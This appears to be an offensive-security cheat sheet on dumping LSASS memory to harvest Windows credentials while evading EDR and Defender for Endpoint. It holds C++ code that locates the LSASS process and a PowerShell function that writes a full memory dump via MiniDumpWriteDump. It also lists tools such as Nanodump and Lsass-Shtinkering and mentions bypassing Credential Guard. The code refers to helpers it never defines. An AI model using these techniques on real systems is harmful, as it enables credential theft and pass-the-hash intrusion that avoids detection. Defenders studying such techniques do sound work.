tasklist /v to enumerate LSASS PID is detected by EDR
FindLSASSPID.cpp
// Find PID of a process by name
int FindPID(const char* procname)
{
int pid= 0;
PROCESSENTRY32 proc = {};
proc.dwSize= sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);bool bProc= Process32First(snapshot, &proc);
while (bProc)
{
if (strcmp(procname, proc.szExeFile) == 0)
{
pid= proc.th32ProcessID;
break;
}
bProc= Process32Next(snapshot, &proc);
}
return pid;
}
Nanodump
POSTDump
Powershell - Bypass Defender for Endpoint
function Write-MemoryDump {
param(
[string]$outputPath
)
$processId = Get-ProcessId
if (-not $processId) { return $false }
try {
# Open target process
$processHandle = [System.Diagnostics.Process]::GetProcessById($processId).Handle
if (-not $processHandle) {
Write-Host “Failed to open target process with PID: $processId”
return $false
}
Write-Host “Successfully opened target process with PID: $processId”
# Create dump file
$fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
$fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle()
Write-Host “Dump file created at $outputPath”
# Write memory dump
$success = [DumpGenerator]::MiniDumpWriteDump(
$processHandle,
[uint32]$processId,
$fileHandle,
[uint32]$FullMemoryDump,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero
)
# Close file stream and release process handle
$fileStream.Close()
[System.Runtime.InteropServices.Marshal]::Release($processHandle)
if ($success) {
Write-Host “Memory dump successfully written to $outputPath”
return $true
} else {
Write-Host “Failed to write memory dump.”
return $false
}
} catch {
Write-Host “An error occurred: $_”
return $false
}
}
Lsass-Shtinkering
Works on Windows 10, Server 2022 - Not working on Server 2019
Go-lsass
Blindsight
AxiomDumper
Bypass Credential Guard
Credential Guard is a virtualization-based isolation technology for LSASS which prevents attackers from stealing credentials that could be used for pass the hash attacks.